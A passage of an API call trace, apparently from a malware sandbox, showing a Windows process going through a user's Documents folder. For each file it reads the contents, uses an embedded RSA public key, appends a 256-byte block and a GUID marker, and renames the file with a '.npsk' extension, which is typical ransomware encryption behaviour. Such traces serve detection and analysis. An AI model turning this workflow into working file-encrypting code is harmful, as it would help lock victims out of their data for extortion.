(hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.106] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.106] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.106] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.106] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.107] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x715a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.107] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.107] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.107] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.107] CloseHandle (hObject=0x61c) returned 1 [0217.110] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\4_7NiL_XEbD7R_E.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\4_7nil_xebd7r_e.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\4_7NiL_XEbD7R_E.odt.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\4_7nil_xebd7r_e.odt.npsk")) returned 1 [0217.112] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadbf8da0, ftCreationTime.dwHighDateTime=0x1d5df99, ftLastAccessTime.dwLowDateTime=0xed890040, ftLastAccessTime.dwHighDateTime=0x1d5df64, ftLastWriteTime.dwLowDateTime=0xed890040, ftLastWriteTime.dwHighDateTime=0x1d5df64, nFileSizeHigh=0x0, nFileSizeLow=0x3323, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BqA5XM9Gr.rtf", cAlternateFileName="BQA5XM~1.RTF")) returned 1 [0217.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\BqA5XM9Gr.rtf") returned=".rtf" [0217.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\BqA5XM9Gr.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\bqa5xm9gr.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.114] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=13091) returned 1 [0217.114] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.116] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x32fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.116] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.118] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x3323, lpOverlapped=0x0) returned 1 [0217.118] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.119] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.119] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.119] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.120] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.120] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.120] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.121] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.121] GetLastError () returned 0x0 [0217.121] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.121] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.121] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.121] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.121] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.121] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.122] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x3323, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.122] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.122] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.122] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.122] CloseHandle (hObject=0x61c) returned 1 [0217.123] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\BqA5XM9Gr.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\bqa5xm9gr.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\BqA5XM9Gr.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\bqa5xm9gr.rtf.npsk")) returned 1 [0217.127] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5488dd0, ftCreationTime.dwHighDateTime=0x1d5da1f, ftLastAccessTime.dwLowDateTime=0xaec83a10, ftLastAccessTime.dwHighDateTime=0x1d5e2c5, ftLastWriteTime.dwLowDateTime=0xaec83a10, ftLastWriteTime.dwHighDateTime=0x1d5e2c5, nFileSizeHigh=0x0, nFileSizeLow=0x8ed3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmi9B.rtf", cAlternateFileName="")) returned 1 [0217.127] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\cmi9B.rtf") returned=".rtf" [0217.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\cmi9B.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\cmi9b.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.128] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=36563) returned 1 [0217.128] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.130] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8ead, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.130] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.132] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x8ed3, lpOverlapped=0x0) returned 1 [0217.133] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.133] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.133] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.133] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.134] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.134] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.134] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.134] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.134] GetLastError () returned 0x0 [0217.134] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.134] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.134] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.134] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.134] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.135] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.135] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8ed3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.135] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.135] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.135] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.136] CloseHandle (hObject=0x61c) returned 1 [0217.137] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\cmi9B.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\cmi9b.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\cmi9B.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\cmi9b.rtf.npsk")) returned 1 [0217.139] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a1eb3a0, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xabc21310, ftLastAccessTime.dwHighDateTime=0x1d5d90e, ftLastWriteTime.dwLowDateTime=0xabc21310, ftLastWriteTime.dwHighDateTime=0x1d5d90e, nFileSizeHigh=0x0, nFileSizeLow=0x6863, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FXLVC.csv", cAlternateFileName="")) returned 1 [0217.139] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\FXLVC.csv") returned=".csv" [0217.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\FXLVC.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\fxlvc.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.139] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=26723) returned 1 [0217.139] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.141] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x683d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.141] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.143] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x6863, lpOverlapped=0x0) returned 1 [0217.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.145] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.146] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.146] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.146] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.146] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.146] GetLastError () returned 0x0 [0217.146] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.146] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.146] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.146] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.146] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.147] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.147] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6863, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.147] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.148] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.148] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.148] CloseHandle (hObject=0x61c) returned 1 [0217.149] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\FXLVC.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\fxlvc.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\FXLVC.csv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\fxlvc.csv.npsk")) returned 1 [0217.151] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65114160, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x3371cce0, ftLastAccessTime.dwHighDateTime=0x1d5df88, ftLastWriteTime.dwLowDateTime=0x3371cce0, ftLastWriteTime.dwHighDateTime=0x1d5df88, nFileSizeHigh=0x0, nFileSizeLow=0x4cdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IJSK h.csv", cAlternateFileName="IJSKH~1.CSV")) returned 1 [0217.151] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\IJSK h.csv") returned=".csv" [0217.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\IJSK h.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\ijsk h.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.151] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=19677) returned 1 [0217.151] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.153] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4cb7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.154] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.155] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, 